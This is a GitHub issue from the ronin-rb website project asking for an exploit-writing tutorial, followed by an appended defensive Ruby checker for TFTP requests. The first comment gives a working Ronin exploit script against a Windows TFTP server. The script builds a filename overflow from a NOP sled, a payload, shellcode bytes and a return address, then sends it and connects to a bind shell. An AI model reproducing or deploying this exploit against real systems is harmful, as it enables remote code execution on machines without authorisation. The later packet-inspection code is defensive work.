ronin-rb / ronin-rb.github.io

The ronin-rb.dev website
https://ronin-rb.dev
GNU General Public License v3.0

Add a "your first exploit" tutorial #2

Closed (postmodern closed 1 year ago)

postmodern commented 13 years ago

Add a tutorial detailing how to write exploits using ronin-exploits.

#!/usr/bin/ronin-exploit -f

require 'ronin/exploit/remote_udp'

Ronin::Exploits::RemoteUDP.object do

  cache do
    self.description = "TFTP Server for Windows V1.4 ST (0day)"
    self.url = "http://www.offensive-security.com"
  end

  parameter :host, :default => '172.16.167.134'

  parameter :port, :default => 69

  build do
    # Jump back shellcode
    sc = "\x6a\x05\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x16\x91\x9c"
    sc += "\x30\x83\xeb\xfc\xe2\xf4\xcf\x7f\x45\x44\x32\x65\xc5\xb0\xd7\x9b"
    sc += "\x0c\xce\xdb\x6f\x51\xcf\xf7\x91\x9c\x30"

    filename = ("\x90" * 860)   +
               @encoded_payload +
               ("\x90" * 14)    +
               "#{sc}\xeb\xd0\x90\x90\x2b\x0e\x41"

    mode = "netascii"

    @exploit = "\x00\x02" + filename + "\0" + mode + "\0"
  end

  deploy do
    print_info "Sending evil packet, ph33r"

    udp_send @exploit

    print_info "Connecting to bind shell"
  end

end

postmodern commented 1 year ago

Superseded by issue #30.
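
The script in the first comment sends a TFTP write request (opcode 0x0002) whose filename field is well over 800 bytes long and mostly non-printable. As an added example (not part of the issue and not ronin-exploits code), this Ruby check parses read/write request datagrams and flags those traits on the receiving side; the function name, the 255-byte filename limit and the sample packets are assumptions constructed here.

```ruby
# Added example: sanity checks for TFTP read/write requests (RFC 1350 layout:
# 2-byte opcode, filename, NUL, mode, NUL, then optional RFC 2347 options).
TFTP_REQUESTS = { 1 => :rrq, 2 => :wrq }.freeze
TFTP_MODES    = %w[netascii octet mail].freeze
MAX_REQUEST   = 512 # RFC 2347: a request packet is at most 512 octets
MAX_FILENAME  = 255 # assumed local policy limit, not taken from the issue

# Returns an array of findings; empty means the request looks well-formed.
def inspect_tftp_request(datagram)
  data = datagram.b
  return [:not_a_request] if data.bytesize < 2
  return [:not_a_request] unless TFTP_REQUESTS.key?(data.unpack1('n'))

  findings = []
  findings << :oversized_request if data.bytesize > MAX_REQUEST

  filename, mode, *rest = data.byteslice(2, data.bytesize).split("\0", -1)
  # Every field is NUL-terminated, so the last split element must be empty.
  return findings << :malformed if mode.nil? || rest.empty? || !rest.last.empty?

  findings << :filename_too_long if filename.bytesize > MAX_FILENAME
  findings << :filename_non_printable if filename.each_byte.any? { |b| b < 0x20 || b > 0x7e }
  findings << :unknown_mode unless TFTP_MODES.include?(mode.downcase)
  findings
end

# Constructed sample datagrams (filler bytes only, no payload).
SAMPLE_OK        = "\x00\x01boot.cfg\0octet\0".b
SAMPLE_OVERLONG  = ("\x00\x02" + ("\x90" * 900) + "\0netascii\0").b
SAMPLE_TRUNCATED = "\x00\x02name".b

if __FILE__ == $PROGRAM_NAME
  { ok: SAMPLE_OK, overlong: SAMPLE_OVERLONG, truncated: SAMPLE_TRUNCATED }.each do |name, pkt|
    puts "#{name}: #{inspect_tftp_request(pkt).inspect}"
  end
end
```

A server or network sensor can drop or log any request with a non-empty findings list before the filename reaches path-handling code.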